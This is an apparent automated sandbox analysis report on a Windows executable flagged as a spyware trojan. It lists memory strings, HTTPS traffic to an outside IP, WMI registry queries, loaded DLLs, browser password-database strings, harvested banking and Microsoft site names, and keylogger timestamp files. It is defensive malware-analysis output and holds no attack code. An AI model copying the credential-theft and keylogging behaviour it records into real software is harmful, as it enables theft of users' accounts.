            Source: wMy37vlfvz.exe, 00000001.00000003.2372220931.000000000087E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: wMy37vlfvz.exe, 00000001.00000003.2419730320.00000000008CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fundingchoicesmessages.google.com/i/pub-8790158038613050?ers=1
            Source: wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2869807476.0000000003328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
            Source: wMy37vlfvz.exe, 00000001.00000003.2422426682.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2419621797.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2419730320.00000000008CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://showip.net/
            Source: wMy37vlfvz.exe, 00000001.00000003.2422426682.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2419621797.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2419730320.00000000008CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://showip.net/?checkip=
            Source: wMy37vlfvz.exe, 00000001.00000003.2419730320.00000000008CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://unpkg.com/leaflet
            Source: wMy37vlfvz.exe, 00000001.00000003.2372220931.000000000087E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: wMy37vlfvz.exe, 00000001.00000003.2372220931.000000000087E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: wMy37vlfvz.exe, 00000001.00000003.2422426682.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2427031495.00000000008E7000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2419730320.00000000008CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-L6NKT5G6D7
            Source: wMy37vlfvz.exe, 00000001.00000003.2422426682.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2419621797.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2419730320.00000000008CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.openstreetmap.org/copyright
            Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
            Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
            Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
            Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
            Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
            Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
            Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
            Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
            Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49841 version: TLS 1.2

            System Summary

            barindex
            Source: wMy37vlfvz.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::enumvalues
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::getstringvalue
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
            Source: wMy37vlfvz.exeStatic PE information: Resource name: CUSTOM type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
            Source: wMy37vlfvz.exeBinary or memory string: OriginalFilenamesootiest.exe vs wMy37vlfvz.exe
            Source: wMy37vlfvz.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: wMy37vlfvz.exeBinary or memory string: D*\AC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp4A@=
            Source: classification engineClassification label: mal100.troj.spyw.winEXE@2/19@2/2
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeMutant created: NULL
            Source: wMy37vlfvz.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: wMy37vlfvz.exe, 00000001.00000003.2378529333.000000000088B000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2377514856.000000000088E000.00000004.00000020.00020000.00000000.sdmp, LogqueintiseRngmeEXkkcAcRDShRzsDXooICEfirelit.1.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: wMy37vlfvz.exeReversingLabs: Detection: 65%
            Source: unknownProcess created: C:\Users\user\Desktop\wMy37vlfvz.exe "C:\Users\user\Desktop\wMy37vlfvz.exe"
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeProcess created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: msvbvm60.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: vb6zz.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: msxml3.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeSection loaded: msxml3.dllJump to behavior
            Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: esscli.dllJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EE09B103-97E0-11CF-978F-00A02463E06F}\InprocServer32Jump to behavior
            Source: Binary string: W.pdb4 source: wMy37vlfvz.exe
            Source: wMy37vlfvz.exeStatic PE information: real checksum: 0x7e01c should be: 0x713a6
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\wMy37vlfvz.exeWindow / User API: foregroundWindowGot 1778Jump to behavior
            Source: WebData.1.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: WebData.1.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: WebData.1.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: WebData.1.drBinary or memory string: discord.comVMware20,11696487552f
            Source: WebData.1.drBinary or memory string: bankofamerica.comVMware20,11696487552x
            Source: WebData.1.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: WebData.1.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: wMy37vlfvz.exe, 00000001.00000003.2419730320.00000000008CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: WebData.1.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: WebData.1.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: WebData.1.drBinary or memory string: global block list test formVMware20,11696487552
            Source: WebData.1.drBinary or memory string: tasks.office.comVMware20,11696487552o
            Source: WebData.1.drBinary or memory string: AMC password management pageVMware20,11696487552
            Source: WebData.1.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: WebData.1.drBinary or memory string: interactivebrokers.comVMware20,11696487552
            Source: WebData.1.drBinary or memory string: dev.azure.comVMware20,11696487552j
            Source: WebData.1.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: WebData.1.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: WebData.1.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: WebData.1.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: WebData.1.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: WebData.1.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: WebData.1.drBinary or memory string: outlook.office365.comVMware20,11696487552t
            Source: WebData.1.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: WebData.1.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: WebData.1.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: WebData.1.drBinary or memory string: outlook.office.comVMware20,11696487552s
            Source: WebData.1.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: WebData.1.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: WebData.1.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: WebData.1.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: WebData.1.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896376004.00000000033CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [07:39:51]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896376004.00000000033CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [07:40:07]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896467976.0000000000909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 59]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896467976.0000000000909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896376004.00000000033CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [07:40:01]<<Program Manager>>
            Source: KeyDataUNbfPUtV.txt.1.drBinary or memory string: [07:41:27]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896467976.0000000000909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :58]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896467976.0000000000909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896467976.0000000000909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 07:39:56]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896467976.0000000000909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [07:39:45]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896376004.00000000033CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [07:39:56]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896376004.00000000033CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [07:40:08]<<Program Manager>>
            Source: KeyDatakmrNhWWq.txt.1.drBinary or memory string: [07:40:58]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896376004.00000000033CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [07:40:00]<<Program Manager>>
            Source: KeyDataXAbtkbVC.txt.1.drBinary or memory string: [07:40:36]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896467976.0000000000909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9:58]<<Program Manager>>
            Source: KeyDatafTuSdKgn.txt.1.drBinary or memory string: [07:41:10]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896467976.0000000000909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [07:39:47]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896376004.00000000033CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [07:40:05]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896467976.0000000000909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7:39:57]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896467976.0000000000909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [07:39:42]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896467976.0000000000909000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [07:39:46]<<Program Manager>>
            Source: KeyDatakmrNhWWq.txt.1.drBinary or memory string: [07:41:06]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2385236375.000000000088D000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003328000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [07:39:29]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896376004.00000000033CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [07:39:50]<<Program Manager>>
            Source: KeyDataXAbtkbVC.txt.1.drBinary or memory string: [07:40:35]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896376004.00000000033CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [07:40:09]<<Program Manager>>
            Source: wMy37vlfvz.exe, 00000001.00000003.2869865932.000000000090A000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896286936.0000000003348000.00000004.00000020.00020000.00000000.sdmp, wMy37vlfvz.exe, 00000001.00000003.2896376004.00000000033CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [07:39:55]<<Program Manager>>
